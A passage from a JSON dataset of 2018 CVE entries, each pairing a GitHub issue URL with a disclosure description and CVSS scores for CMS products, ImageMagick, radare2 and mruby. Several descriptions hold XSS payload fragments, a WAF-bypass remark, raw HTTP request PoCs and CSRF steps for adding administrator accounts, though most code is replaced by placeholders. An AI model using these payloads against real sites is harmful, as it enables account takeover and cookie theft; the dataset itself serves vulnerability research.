  18113. "Issue_Url_old": "https://github.com/gosea/xyhcms/issues/2",
  18114. "Issue_Url_new": "https://github.com/gosea/xyhcms/issues/2",
  18115. "Repo_new": "gosea/xyhcms",
  18116. "Issue_Created_At": "2018-04-16T08:31:55Z",
  18117. "description": "There is a XSS vulnerability that can execute the APITAG code. url: URLTAG URL is written to the HTML page and closed by using \u2018>. FILETAG",
  18118. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  18119. "severity": "MEDIUM",
  18120. "baseScore": 6.1,
  18121. "impactScore": 2.7,
  18122. "exploitabilityScore": 2.8
  18123. },
  18124. {
  18125. "CVE_ID": "CVE-2018-10177",
  18126. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1095",
  18127. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1095",
  18128. "Repo_new": "imagemagick/imagemagick",
  18129. "Issue_Created_At": "2018-04-16T22:11:54Z",
  18130. "description": "Infinite loop in APITAG ( PATHTAG ). Commit: APITAG Description In latest commit of APITAG there is an infinite loop in APITAG function of PATHTAG file, which could be triggered by the attached POC. The issue is in the following loop, and it seems that image_info is never updated inside the loop (line NUMBERTAG static Image APITAG mng_info, const APITAG image_info NUMBERTAG APITAG exception NUMBERTAG do NUMBERTAG while APITAG >magick,\"MNG NUMBERTAG Steps to Reproduce NUMBERTAG install libpng NUMBERTAG checkout commit APITAG of APITAG NUMBERTAG compile APITAG and run: PATHTAG $POC FILETAG . System Configuration APITAG version: APITAG Environment APITAG system, version and so on): Linux test NUMBERTAG generic NUMBERTAG Ubuntu SMP Wed Oct NUMBERTAG UTC NUMBERTAG APITAG Stack Trace NUMBERTAG ffff6cafc NUMBERTAG in __GI___fxstat (vers=<optimized out>, fd NUMBERTAG buf NUMBERTAG ac8) at PATHTAG NUMBERTAG ffff NUMBERTAG af9d in APITAG (image NUMBERTAG ca NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG d8a NUMBERTAG in APITAG (mng_info NUMBERTAG image_info NUMBERTAG b NUMBERTAG exception NUMBERTAG d NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG e NUMBERTAG in APITAG (image_info NUMBERTAG b NUMBERTAG exception NUMBERTAG d NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG a1d0c in APITAG (image_info NUMBERTAG d NUMBERTAG exception NUMBERTAG d NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG b in APITAG (image_info NUMBERTAG a NUMBERTAG filename NUMBERTAG c NUMBERTAG APITAG exception NUMBERTAG d NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG e in APITAG (image_info NUMBERTAG a NUMBERTAG argc NUMBERTAG arg NUMBERTAG b NUMBERTAG metadata NUMBERTAG fffffffbcc0, exception NUMBERTAG d NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG eb NUMBERTAG in APITAG (image_info NUMBERTAG command NUMBERTAG fb0 APITAG argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG metadata NUMBERTAG exception NUMBERTAG d NUMBERTAG at PATHTAG NUMBERTAG in APITAG (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at PATHTAG NUMBERTAG in main (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at PATHTAG FILETAG",
  18131. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  18132. "severity": "MEDIUM",
  18133. "baseScore": 6.5,
  18134. "impactScore": 3.6,
  18135. "exploitabilityScore": 2.8
  18136. },
  18137. {
  18138. "CVE_ID": "CVE-2018-10183",
  18139. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/333",
  18140. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/333",
  18141. "Repo_new": "bigtreecms/bigtree-cms",
  18142. "Issue_Created_At": "2018-04-17T12:41:08Z",
  18143. "description": "Cross site Scripting (XSS) in bigtreecms NUMBERTAG Cross site Scripting (XSS) in bigtreecms NUMBERTAG The vulnerability is in PATHTAG FILETAG POC\uff1a PATHTAG APITAG APITAG alert NUMBERTAG APITAG &file=charsets FILETAG thank you~",
  18144. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  18145. "severity": "MEDIUM",
  18146. "baseScore": 6.1,
  18147. "impactScore": 2.7,
  18148. "exploitabilityScore": 2.8
  18149. },
  18150. {
  18151. "CVE_ID": "CVE-2018-10185",
  18152. "Issue_Url_old": "https://github.com/yeyinshi/tuzicms/issues/1",
  18153. "Issue_Url_new": "https://github.com/yeyinshi/tuzicms/issues/1",
  18154. "Repo_new": "yeyinshi/tuzicms",
  18155. "Issue_Created_At": "2018-04-17T13:39:09Z",
  18156. "description": "There is a CSRF vulnerability that can add the administrator account. After the administrator logged in\uff0cwe can use the poc to add a admin\uff1a APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  18157. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  18158. "severity": "HIGH",
  18159. "baseScore": 8.8,
  18160. "impactScore": 5.9,
  18161. "exploitabilityScore": 2.8
  18162. },
  18163. {
  18164. "CVE_ID": "CVE-2018-10187",
  18165. "Issue_Url_old": "https://github.com/radare/radare2/issues/9913",
  18166. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9913",
  18167. "Repo_new": "radareorg/radare2",
  18168. "Issue_Created_At": "2018-04-17T14:40:15Z",
  18169. "description": "heap buffer overflow in dalvik_op ( PATHTAG ). Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | dex | Architecture/bits of the file (mandatory) | Dalvik dex file version NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG f NUMBERTAG commit: APITAG build NUMBERTAG Expected behavior Success processing of dex file Actual behavior heap buffer overflow Steps to reproduce the behavior NUMBERTAG checkout commit APITAG NUMBERTAG compile with ASAN enabled NUMBERTAG download the attached POC NUMBERTAG run: bin/radare2 A $POC Vulnerable code PATHTAG NUMBERTAG static int APITAG anal, APITAG op, ut NUMBERTAG addr, const ut8 data, int len NUMBERTAG case NUMBERTAG a: // goto NUMBERTAG if (len NUMBERTAG op >jump = addr + (int)(data FILETAG",
  18170. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  18171. "severity": "MEDIUM",
  18172. "baseScore": 5.5,
  18173. "impactScore": 3.6,
  18174. "exploitabilityScore": 1.8
  18175. },
  18176. {
  18177. "CVE_ID": "CVE-2018-10191",
  18178. "Issue_Url_old": "https://github.com/mruby/mruby/issues/3995",
  18179. "Issue_Url_new": "https://github.com/mruby/mruby/issues/3995",
  18180. "Repo_new": "mruby/mruby",
  18181. "Issue_Created_At": "2018-04-10T18:31:36Z",
  18182. "description": "Use after free caused by integer overflow in environment stack. URLTAG reported the following: Root Cause: =========== Nesting many scopes as seen in the input leads to an integer overflow in OP_GET_UPVAR: CODETAG Details: ======== If NUMBERTAG scopes are nested and we access a variable from the outermost scope from the innermost scope, c overflows to NUMBERTAG b contains the index of the variable in the outer scope, but is used to offset into the inner scope's stackframe. If the outermost scope contains many variables, b can become large. If b is large, and the innermost stackframe is small, we can use memory from outside the stackframe as mrb_value. In some cases, a mrb_value can contain a pointer (objects, strings etc). In these cases, the pointer can be corrupted by controlling the memory outside the stack frame. Our POC triggers a use after free access (see APITAG In other cases, we can simply change variables from other stackframes, we observed some type confusions in various C functions that seem to dislike values changing magically (see the attached input nullptr_deref.rb, where a corrupted proc object is used in places where an object is expected). Bugfix: ======= Ensure that deep nesting is an error condition (As this will cause bugs in ruby programs, even if the underlying C code is fixed). Additionally add the following check (taken from SET_UPVAR, where the size is checked correctly) APITAG Steps to Reproduce: ================== setup latest mruby CODETAG run inputs: ERRORTAG and also: ERRORTAG Authors: ======== Daniel Teuchert, Cornelius Aschermann, Tommaso Frassetto, Tigist Abera Impact By leveraging the use after free, an attacker is most likely able to obtain arbitrary code execution. APITAG : CODETAG APITAG : CODETAG",
  18183. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  18184. "severity": "CRITICAL",
  18185. "baseScore": 9.8,
  18186. "impactScore": 5.9,
  18187. "exploitabilityScore": 3.9
  18188. },
  18189. {
  18190. "CVE_ID": "CVE-2018-10199",
  18191. "Issue_Url_old": "https://github.com/mruby/mruby/issues/4001",
  18192. "Issue_Url_new": "https://github.com/mruby/mruby/issues/4001",
  18193. "Repo_new": "mruby/mruby",
  18194. "Issue_Created_At": "2018-04-16T15:50:03Z",
  18195. "description": "Use after free in File initialize_copy. The following was reported by URLTAG Root Cause: ========== calling APITAG with an invalid argument causes the function to terminate early, leaving a dangling pointer in the receiver's APITAG . ERRORTAG Details & Impact ======= initialize_copy first frees the APITAG , then it gets the data pointer for the first argument. This operation can raise an exception, in which case APITAG remains dangling. By proper heap feng shui, one can allocate another value (such as string) in the same spot. Calling APITAG will set APITAG , effectively setting some memory to APITAG . This can be used to change the size of a string object. The corrupted string can then be used to read/write memory. This can be used to obtain arbitrary code execution. CODETAG Bugfix ====== Move APITAG to the top of the function (next to APITAG ). Steps to Reproduce ================== obtain current mruby version CODETAG run testcase ERRORTAG Authors: Daniel Teuchert, Cornelius Aschermann, Tommaso Frassetto, Tigist Abera",
  18196. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  18197. "severity": "CRITICAL",
  18198. "baseScore": 9.8,
  18199. "impactScore": 5.9,
  18200. "exploitabilityScore": 3.9
  18201. },
  18202. {
  18203. "CVE_ID": "CVE-2018-10220",
  18204. "Issue_Url_old": "https://github.com/mushorg/glastopf/issues/286",
  18205. "Issue_Url_new": "https://github.com/mushorg/glastopf/issues/286",
  18206. "Repo_new": "mushorg/glastopf",
  18207. "Issue_Created_At": "2018-04-16T07:28:39Z",
  18208. "description": "there is a vulnerability of Server Side Request Forgery. My English isn't fluent when I let this program run in my nginx web site, I find it has Server Side Request Forgery vulnerability for example , the url is APITAG and I can get the log from the other web server which this APITAG it. I know you have do something that prevent it, though I can see ERRORTAG from this request APITAG Maybe the other hackers could use it to attack the other website as a proxy My English really is not fluent I hope you can understand my means, thanks, bro.",
  18209. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  18210. "severity": "HIGH",
  18211. "baseScore": 8.8,
  18212. "impactScore": 5.9,
  18213. "exploitabilityScore": 2.8
  18214. },
  18215. {
  18216. "CVE_ID": "CVE-2018-10221",
  18217. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/129",
  18218. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/129",
  18219. "Repo_new": "wuzhicms/wuzhicms",
  18220. "Issue_Created_At": "2018-04-18T08:50:37Z",
  18221. "description": "There is a persistent XSS vulnerability that can steal the cookies of the administrator . After the website editor(whose privilege is lower than the administrator) logged in,he can add a new TAGS with the XSS payload. exploit the vulnerability\uff0ca website editor can steal the cookies when the administrator browse the TAGS Management and activate the XSS code . The vulnerability APITAG distribution >TAGS management >ADD TAGS FILETAG Inject the XSS payload: APITAG alert(/xss/) APITAG FILETAG",
  18222. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  18223. "severity": "MEDIUM",
  18224. "baseScore": 5.4,
  18225. "impactScore": 2.7,
  18226. "exploitabilityScore": 2.3
  18227. },
  18228. {
  18229. "CVE_ID": "CVE-2018-10222",
  18230. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/21",
  18231. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/21",
  18232. "Repo_new": "idreamsoft/iCMS",
  18233. "Issue_Created_At": "2018-04-18T04:39:00Z",
  18234. "description": "CSRF exists in the idreamsoft iCMS NUMBERTAG Column Management add. CSRF exists in the idreamsoft iCMS NUMBERTAG Column Management add and can be add Column Management by constructing paylod\u3002 Paylod: APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG FILETAG FILETAG",
  18235. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  18236. "severity": "HIGH",
  18237. "baseScore": 8.8,
  18238. "impactScore": 5.9,
  18239. "exploitabilityScore": 2.8
  18240. },
  18241. {
  18242. "CVE_ID": "CVE-2018-10223",
  18243. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/1",
  18244. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/1",
  18245. "Repo_new": "yzmcms/yzmcms",
  18246. "Issue_Created_At": "2018-04-19T02:40:25Z",
  18247. "description": "There are two CSRF vulnerabilities that can add an administrator account. There are two CSRF vulnerabilities that can add an administrator account. After the administrator has logged in, open the following page. POC: URLTAG FILETAG For example: FILETAG",
  18248. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H",
  18249. "severity": "MEDIUM",
  18250. "baseScore": 6.8,
  18251. "impactScore": 5.9,
  18252. "exploitabilityScore": 0.9
  18253. },
  18254. {
  18255. "CVE_ID": "CVE-2018-10224",
  18256. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/2",
  18257. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/2",
  18258. "Repo_new": "yzmcms/yzmcms",
  18259. "Issue_Created_At": "2018-04-19T02:41:09Z",
  18260. "description": "There are two CSRF vulnerabilities that can add a Tag. There are two CSRF vulnerabilities that can add a Tag account. After the administrator has logged in, open the following page. POC: URLTAG FILETAG For example: FILETAG",
  18261. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H",
  18262. "severity": "MEDIUM",
  18263. "baseScore": 6.8,
  18264. "impactScore": 5.9,
  18265. "exploitabilityScore": 0.9
  18266. },
  18267. {
  18268. "CVE_ID": "CVE-2018-10227",
  18269. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/15",
  18270. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/15",
  18271. "Repo_new": "bg5sbk/minicms",
  18272. "Issue_Created_At": "2018-04-18T03:28:13Z",
  18273. "description": "There is a xss vulnerability XSS vulnerability can attack users to execute commands. There is a storage XSS vulnerability at the location of the web site at the page setup site, which can be executed by constructing POC. poc: POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG APITAG FILETAG APITAG exp at the site_link parameter FILETAG APITAG through IE, run active FILETAG APITAG up the CMD command FILETAG",
  18274. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  18275. "severity": "MEDIUM",
  18276. "baseScore": 5.4,
  18277. "impactScore": 2.7,
  18278. "exploitabilityScore": 2.3
  18279. },
  18280. {
  18281. "CVE_ID": "CVE-2018-10248",
  18282. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/130",
  18283. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/130",
  18284. "Repo_new": "wuzhicms/wuzhicms",
  18285. "Issue_Created_At": "2018-04-20T13:57:13Z",
  18286. "description": "There is one CSRF vulnerability that can Delete any article. After the administrator logged in, open the following page poc\uff1a APITAG Delete any article APITAG APITAG APITAG APITAG APITAG APITAG Id and cid parameters can be seen in the foreground like this URLTAG",
  18287. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  18288. "severity": "MEDIUM",
  18289. "baseScore": 6.5,
  18290. "impactScore": 3.6,
  18291. "exploitabilityScore": 2.8
  18292. },
  18293. {
  18294. "CVE_ID": "CVE-2018-10250",
  18295. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/22",
  18296. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/22",
  18297. "Repo_new": "idreamsoft/iCMS",
  18298. "Issue_Created_At": "2018-04-20T08:52:50Z",
  18299. "description": "iCMS NUMBERTAG SS. Log in first \uff08 FILETAG \uff09 All search boxes exist in XSS, payload \uff1a \"/> APITAG confirm NUMBERTAG APITAG APITAG > classified management > keyword search WAF detects alert, confirm bypasses the waf payload: APITAG APITAG GET PATHTAG NUMBERTAG APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: UM_distinctid NUMBERTAG db NUMBERTAG f8a NUMBERTAG c NUMBERTAG a NUMBERTAG db NUMBERTAG f8c3bc; APITAG NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG iCMS_tag_category_tabs=tree; APITAG APITAG csrf_token NUMBERTAG ac0a NUMBERTAG ca5abfea6; APITAG APITAG APITAG APITAG Connection: keep alive Upgrade Insecure Requests NUMBERTAG FILETAG FILETAG",
  18300. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  18301. "severity": "MEDIUM",
  18302. "baseScore": 5.4,
  18303. "impactScore": 2.7,
  18304. "exploitabilityScore": 2.3
  18305. },
  18306. {
  18307. "CVE_ID": "CVE-2018-10266",
  18308. "Issue_Url_old": "https://github.com/source-trace/beescms/issues/1",
  18309. "Issue_Url_new": "https://github.com/source-trace/beescms/issues/1",
  18310. "Repo_new": "source-trace/beescms",
  18311. "Issue_Created_At": "2018-04-19T12:14:03Z",
  18312. "description": "There is two CSRF vulnerability that can add the administrator account. After the administrator logged in, open the following one page poc\uff1a CODETAG FILETAG FILETAG URLTAG FILETAG",
  18313. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  18314. "severity": "HIGH",
  18315. "baseScore": 8.8,
  18316. "impactScore": 5.9,
  18317. "exploitabilityScore": 2.8
  18318. },
  18319. {
  18320. "CVE_ID": "CVE-2018-10267",
  18321. "Issue_Url_old": "https://github.com/taosir/wtcms/issues/1",
  18322. "Issue_Url_new": "https://github.com/taosir/wtcms/issues/1",
  18323. "Repo_new": "taosir/wtcms",
  18324. "Issue_Created_At": "2018-04-21T07:29:01Z",
  18325. "description": "Has a CSRF vulnerability and can add an administrator account. After the administrator logs in, open the CSRF exp page. CODETAG",
  18326. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  18327. "severity": "HIGH",
  18328. "baseScore": 8.8,
  18329. "impactScore": 5.9,
  18330. "exploitabilityScore": 2.8
  18331. },
  18332. {
  18333. "CVE_ID": "CVE-2018-10295",
  18334. "Issue_Url_old": "https://github.com/chemcms/ChemCMS/issues/1",
  18335. "Issue_Url_new": "https://github.com/chemcms/chemcms/issues/1",
  18336. "Repo_new": "chemcms/chemcms",
  18337. "Issue_Created_At": "2018-04-22T09:40:24Z",
  18338. "description": "CSRF vulnerability can add the administrator account. The administrator needs to login to the background and open the following page. poc: ERRORTAG",
  18339. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  18340. "severity": "HIGH",
  18341. "baseScore": 8.8,
  18342. "impactScore": 5.9,
  18343. "exploitabilityScore": 2.8
  18344. },
  18345. {
  18346. "CVE_ID": "CVE-2018-10296",
  18347. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/17",
  18348. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/17",
  18349. "Repo_new": "bg5sbk/minicms",
  18350. "Issue_Created_At": "2018-04-22T04:14:14Z",
  18351. "description": "This is a stored XSS vulnerability that we can easily get their cookie. This is a stored XSS vulnerability first\uff0cwe shoud land \uff08 URLTAG \uff09 writing articles and published an article payload APITAG APITAG i think you can see the following picture to konw more. POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: APITAG UM_distinctid NUMBERTAG db NUMBERTAG f8a NUMBERTAG c NUMBERTAG a NUMBERTAG db NUMBERTAG f8c3bc; APITAG NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG csrf_token NUMBERTAG ac0a NUMBERTAG ca5abfea6 Connection: keep alive Upgrade Insecure Requests NUMBERTAG APITAG APITAG APITAG APITAG APITAG FILETAG when we published the article and we can see it from homepage. FILETAG If people read our articles, we can easily get their cookie. src= FILETAG FILETAG",
  18352. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  18353. "severity": "MEDIUM",
  18354. "baseScore": 6.1,
  18355. "impactScore": 2.7,
  18356. "exploitabilityScore": 2.8
  18357. },
  18358. {
  18359. "CVE_ID": "CVE-2018-10311",
  18360. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/131",
  18361. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/131",
  18362. "Repo_new": "wuzhicms/wuzhicms",
  18363. "Issue_Created_At": "2018-04-23T07:59:48Z",
  18364. "description": "There is a cross site scripting vulnerability. A xss vulnerability was discovered in WUZHI CMS NUMBERTAG There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the APITAG parameter post to the APITAG When visiting again APITAG xss code execution poc: FILETAG CODETAG APITAG ERRORTAG FILETAG",
  18365. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  18366. "severity": "MEDIUM",
  18367. "baseScore": 6.1,
  18368. "impactScore": 2.7,
  18369. "exploitabilityScore": 2.8
  18370. },
  18371. {
  18372. "CVE_ID": "CVE-2018-10312",
  18373. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/132",
  18374. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/132",
  18375. "Repo_new": "wuzhicms/wuzhicms",
  18376. "Issue_Created_At": "2018-04-23T10:42:36Z",
  18377. "description": "There is one CSRF vulnerability that can Change the common member's password. The vulnerability occurs in APITAG This is the interface of a common member to reset the password FILETAG The interface does not have CSRF protection, which causes ordinary members to change the login password without knowing their members when they open the Poc page. poc: APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG FILETAG",
  18378. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  18379. "severity": "HIGH",
  18380. "baseScore": 8.8,
  18381. "impactScore": 5.9,
  18382. "exploitabilityScore": 2.8
  18383. },
  18384. {
  18385. "CVE_ID": "CVE-2018-10313",
  18386. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/133",
  18387. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/133",
  18388. "Repo_new": "wuzhicms/wuzhicms",
  18389. "Issue_Created_At": "2018-04-23T14:32:02Z",
  18390. "description": "There is a cross site scripting vulnerability . A xss vulnerability was discovered in WUZHI CMS NUMBERTAG There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the APITAG parameter post to the APITAG When the background administrator inquires about the personal information of this ordinary member, XSS triggers successfully. poc: vulnerability trigger point FILETAG CODETAG APITAG FILETAG",
  18391. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  18392. "severity": "MEDIUM",
  18393. "baseScore": 5.4,
  18394. "impactScore": 2.7,
  18395. "exploitabilityScore": 2.3
  18396. },
  18397. {
  18398. "CVE_ID": "CVE-2018-10318",
  18399. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/6",
  18400. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/6",
  18401. "Repo_new": "philippe/frogcms",
  18402. "Issue_Created_At": "2018-04-23T12:25:52Z",
  18403. "description": "Frog CMS NUMBERTAG has a stored Cross Site Scripting Vulnerability. I have found a stored Cross Site Scripting Vulnerability. log into the system as an administrator role\uff1a URLTAG publish an article\uff0cand you can click it. pages APITAG Page APITAG payload: \"/> APITAG confirm NUMBERTAG APITAG i think you can see the following picture to konw more. FILETAG FILETAG POC: POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: current_tab=:tab NUMBERTAG UM_distinctid NUMBERTAG db NUMBERTAG f8a NUMBERTAG c NUMBERTAG a NUMBERTAG db NUMBERTAG f8c3bc; APITAG NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG csrf_token NUMBERTAG ac0a NUMBERTAG ca5abfea6; APITAG Connection: keep alive Upgrade Insecure Requests NUMBERTAG APITAG APITAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG when we published the article and we can see it from homepage. URL\uff1a URLTAG FILETAG FILETAG Anyone who visit the target page will be affected to triage APITAG code, including administrator, editor, developer, and guest. If people read our articles, we can easily get their cookie. APITAG APITAG Affected Version NUMBERTAG",
  18404. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  18405. "severity": "MEDIUM",
  18406. "baseScore": 4.8,
  18407. "impactScore": 2.7,
  18408. "exploitabilityScore": 1.7
  18409. },
  18410. {
  18411. "CVE_ID": "CVE-2018-10319",
  18412. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/7",
  18413. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/7",
  18414. "Repo_new": "philippe/frogcms",
  18415. "Issue_Created_At": "2018-04-23T12:48:47Z",
  18416. "description": "Frog CMS NUMBERTAG has a stored Cross Site Scripting Vulnerability. I have found a stored Cross Site Scripting Vulnerability. log into the system as an administrator role\uff1a URLTAG publish an article\uff0cand you can click it. snippet APITAG snippet APITAG payload\uff1a APITAG \"/> APITAG confirm NUMBERTAG APITAG APITAG save it. i think you can see the following picture to konw more. exp: POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: current_tab=:tab NUMBERTAG expanded_rows NUMBERTAG UM_distinctid NUMBERTAG db NUMBERTAG f8a NUMBERTAG c NUMBERTAG a NUMBERTAG db NUMBERTAG f8c3bc; APITAG NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG csrf_token NUMBERTAG ac0a NUMBERTAG ca5abfea6; APITAG Connection: keep alive Upgrade Insecure Requests NUMBERTAG APITAG APITAG \"/> APITAG confirm NUMBERTAG APITAG APITAG FILETAG FILETAG FILETAG Affected Version NUMBERTAG",
  18417. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  18418. "severity": "MEDIUM",
  18419. "baseScore": 4.8,
  18420. "impactScore": 2.7,
  18421. "exploitabilityScore": 1.7
  18422. },
  18423. {
  18424. "CVE_ID": "CVE-2018-10320",
  18425. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/8",
  18426. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/8",
  18427. "Repo_new": "philippe/frogcms",
  18428. "Issue_Created_At": "2018-04-23T13:00:17Z",
